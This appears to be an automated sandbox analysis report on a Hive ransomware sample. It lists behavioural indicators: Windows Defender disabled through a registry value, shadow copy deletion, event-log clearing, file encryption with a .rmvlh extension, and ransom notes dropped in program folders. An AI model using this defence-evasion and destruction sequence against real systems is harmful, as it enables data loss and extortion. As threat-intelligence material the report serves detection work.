Analysis Overview
SHA256
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083
Threat Level: Known bad
The file 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083 was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies security service
Deletes Windows Defender Definitions
Modifies Windows Defender Real-time Protection settings
Deletes shadow copies
Modifies boot configuration data using bcdedit
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Opens file in notepad (likely ransom note)
Modifies registry class
Runs ping.exe
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 09:48
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 09:48
Reported
2022-01-13 09:54
Platform
win7-en-20211208
Max time kernel
132s
Max time network
121s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\UnprotectReset.crw.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_TztMc1b860w0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UseInstall.png => C:\Users\Admin\Pictures\UseInstall.png.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_4AucOxGY0Lo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UseInstall.png.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_4AucOxGY0Lo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CheckpointPush.tif.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_MxAbmUDgdbs0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ProtectRedo.tiff.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_AZxbhTk0mhE0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnprotectReset.crw => C:\Users\Admin\Pictures\UnprotectReset.crw.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_TztMc1b860w0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ProtectRedo.tiff => C:\Users\Admin\Pictures\ProtectRedo.tiff.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_AZxbhTk0mhE0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CheckpointPush.tif => C:\Users\Admin\Pictures\CheckpointPush.tif.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_MxAbmUDgdbs0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MountCopy.png => C:\Users\Admin\Pictures\MountCopy.png.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_qw5s1wBelM80.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\MountCopy.png.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_qw5s1wBelM80.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\1047x576black.png | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guadalcanal.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_y1oU2Xhny1k0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\library.js | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_HY7-eGp6Hwc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FOLDPROJ.XML.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_FLeRB1Fsj7Y0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_TNz7D3N8eug0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02253_.WMF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_DL1fXeQGrB40.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_5ZycPH8tHIk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Africa\Algiers.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_e-m2OK-b5mo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_rest.png | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\ARCTIC.ELM.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_4n70TR62Q0E0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ENFR\MSB1ENFR.ITS.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_7oj4LsDrzuc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02263_.WMF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_iMrxNzRMEos0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Address.accft.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_M6MOxR5L8n40.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\sXhL_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uz.txt.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_g6eRWxLlslM0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\en-US\wab32res.dll.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_SJQN_2nWWOg0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_moNHyResGPU0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File created | C:\Program Files\Microsoft Games\More Games\ja-JP\sXhL_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\descript.ion.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_ihFfdCzvWQU0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_9QS3a_c4Okg0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\ja-JP\WMPDMC.exe.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CONCRETE\THMBNAIL.PNG.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_wPJHbyi4SSI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PRRTINST.WMF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_ehNfQU0WUlk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21399_.GIF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_yWYCOB-46pQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPrintTemplateRTL.html.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_CLFIdK2_YOI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\mset7jp.kic.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_YqhP5aIoS_k0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\io.txt.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_TGDwjK4xNk40.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_ghlm3KPms1U0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn__pP0RbeKGY40.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_fTtE0BCHW1Q0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_Fq6fZkMyyb80.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0295069.WMF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_9TMN7dWUvSM0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR19F.GIF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_Bfe3fxBZZ1g0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\ja-JP\WMPDMC.exe.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_AaVq0134HPI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_w6-L56A91jA0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\JOURNAL\PREVIEW.GIF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_fG4StNRyPII0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn__FNC9Kk362Y0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_TzhNE1642yI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199805.WMF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_UaujIwGgCs40.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\INDST_01.MID.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_6WIIy53Zz940.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD10972_.GIF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_eBzpSsV2bvQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK.DEV_K_COL.HXK.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_5m2xdjGzzQ00.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mn.txt.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_n8yO9V0dnzs0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitevignette1047.png | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\circle_glass_Thumbnail.bmp | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_7z-3nQeKyJw0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198102.WMF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_XRzZsBhCXWg0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02431_.WMF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_qsXW282YwXk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EXPEDITN\sXhL_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_NO8aBvg7dGo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_NvBvhJaVT7c0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewFrame.html.iA184gQtjK9JZPyT0Wr3IeYcXby_yUbmBoqaKtj3OSn_d-ybFFa_GaQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\flyout.css | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
